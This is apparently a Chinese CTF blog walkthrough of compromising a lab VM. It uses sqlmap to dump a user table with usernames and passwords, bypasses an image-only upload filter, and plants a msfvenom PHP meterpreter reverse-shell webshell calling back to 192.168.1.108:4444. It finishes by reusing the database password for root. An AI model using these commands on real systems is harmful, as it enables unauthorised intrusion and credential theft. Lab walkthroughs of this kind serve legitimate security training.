综合漏洞low

最新推荐文章于 2024-06-19 18:34:52 发布
最新推荐文章于 2024-06-19 18:34:52 发布
阅读量185 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/102244765
版权

靶机102攻击机108

nikto 扫描到两个页面

config.php打开空白,源代码也空白

login.php不知道为社么反应时间特别慢,burp抓包看到源代码

加载好长好长时间终于显示出页面,

页面跳转至

用Burpsuite抓取,复制包头,gedit request.raw复制进去

sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D deneme  --tables --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D deneme -T user --columns  --dbms mysql --batch

sqlmap -r request.raw --level 5 --risk 3 -D deneme -T user -C ID,Ad_Soyad,AnneAdi,AnneMeslegi,BabaAdi,BabaMeslegi,KardesSayisi,Kullanici_Adi,Parola --dump --dbms mysql

修改信息登陆

所以用第一个用户可以上传文件,注入shell

只能上传jpg,gif,png

Burp 抓包,上传Php,改文件名1.jpg改为1.php再上传,上传成功

进入/uploads/页面发现

这时候上传恶意代码,即可反弹shell

使用metasploit启动监听

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.108

生成webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw > /root/1.php

gedit一下将注释符删掉,按照刚刚的步骤上传shell

反弹shell

python -c "import pty;pty.spawn('/bin/sh')"

密码复用,数据库密码就是root密码

 

 

^BonnenuIt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
海康威视综合安防管理平台 detection 前台RCE漏洞复现
0xSec
07-22 4874
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
软件代码漏洞风险等级
最新发布
oscar999的专栏
07-09 288
代码漏洞的风险等级通常根据漏洞的潜在影响、利用难易程度以及可能造成的损害程度来划分。不同的组织或机构可能会采用不同的标准或评分系统来评估漏洞的风险等级。
漏洞综合利用总结
小勇的博客
06-12 2455
漏洞利用综合 目录遍历在搜索引擎里搜”Index of” 由于文件名可以任意更改而服务器支持“ ~/” ,“ /..” 等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件 任意文件下载和读取任意文件读取和下载漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名,从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 867
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
fly夏天的博客
06-19 1821
海康综合安防管理平台远程命令执行漏洞(CNVD-2024-18673)复现
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 872
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 2067
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
漏洞复现】普元EOS Platform-RCE漏洞-eos
知黑而守白
05-15 280
Primeton EOS Platform是普元信息技术股份有限公司推出的一款集成了低代码开发、微服务应用、开发运维一体化等功能的企业级应用开发平台。它帮助企业实现软件开发、运维一体化管理,提升IT运营效率和业务响应速度。普元EOS Platform eos.jmx接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
命令执行漏洞详解及DVWA靶场练习
c_programj的博客
06-25 3270
命令执行漏洞1.产生原因2.漏洞危害3.远程命令执行4.系统命令执行命令执行常用特殊字符5.常见 命令常见系统命令与功能windowslinux6.防范措施7.dvwa靶场练习windows【Low】【Medium】【High】【Impossible】linux【low】【Medium】【High】 1.产生原因 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令来执行。攻击者可以任意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。 RCE:远程命令和代码执行。 2.漏洞危害 ①继承web
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 3280
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
什么是低代码(Low-Code)?
热门推荐
阿里云技术
11-17 6万+
那么在后疫情时代,究竟需要什么样的新技术,才能真正解放IT生产力,加速社会数字化转型,Make The World Great Again?我认为是低代码(Low-Code)。
HiKVISION 综合安防管理平台 env信息泄漏漏洞(1),吃透这份阿里P8纯手打网络安全面经
2401_83974783的博客
04-13 532
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现
0xSec
05-31 1258
海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
海康威视isecure center 综合安防管理平台文件上传漏洞复现
weixin_68647219的博客
09-07 3410
工作发现,海康威视isecure center存在文件上传漏洞,该漏洞是由于海康威视isecure center存在不严谨可能导致存在任意文件上传漏洞
8. CTF综合靶机渗透(一)
weixin_30614587的博客
05-22 1086
靶机说明 虚拟机难度中等,使用ubuntu(32位),其他软件包有: PHP apache MySQL 目标 Boot to root:从Web应用程序进入虚拟机,并获得root权限。 运行环境 靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。 攻击机:同网段下有Windows攻击机,安装有Nmap、Bu...
漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 2393
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0xSec
05-22 1万+
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
dwva low文件上传漏洞的危害和防御措施
12-21
文件上传漏洞是一种常见的Web应用程序安全漏洞,攻击者可以通过该漏洞上传恶意文件到服务器上,从而执行任意代码或获取敏感信息。以下是文件上传漏洞的危害和防御措施: 危害: 1. 执行任意代码:攻击者可以上传包含恶意代码的文件,然后通过执行该文件来获取服务器的控制权。 2. 网站篡改:攻击者可以上传恶意文件来修改网站的内容,例如插入恶意广告、篡改页面等。 3. 数据泄露:攻击者可以上传恶意文件来获取服务器上的敏感信息,例如数据库连接信息、用户密码等。 防御措施: 1. 文件类型白名单:限制上传文件的类型,只允许上传安全的文件类型,例如图片、文档等。可以通过服务器端的文件类型检查来实现。 2. 文件名过滤:对上传的文件名进行过滤,防止攻击者使用特殊字符或路径来绕过文件类型检查。 3. 文件内容检查:对上传的文件进行内容检查,确保文件不包含恶意代码。可以使用杀毒软件或文件解析库来检查文件内容。 4. 文件存储位置:将上传的文件存储在非Web根目录下,防止攻击者直接访问上传的文件。 5. 文件权限设置:确保上传的文件只有必要的执行权限,并限制对上传文件的访问权限。 6. 输入验证:对用户输入进行严格的验证和过滤,防止攻击者通过上传恶意文件的方式进行攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值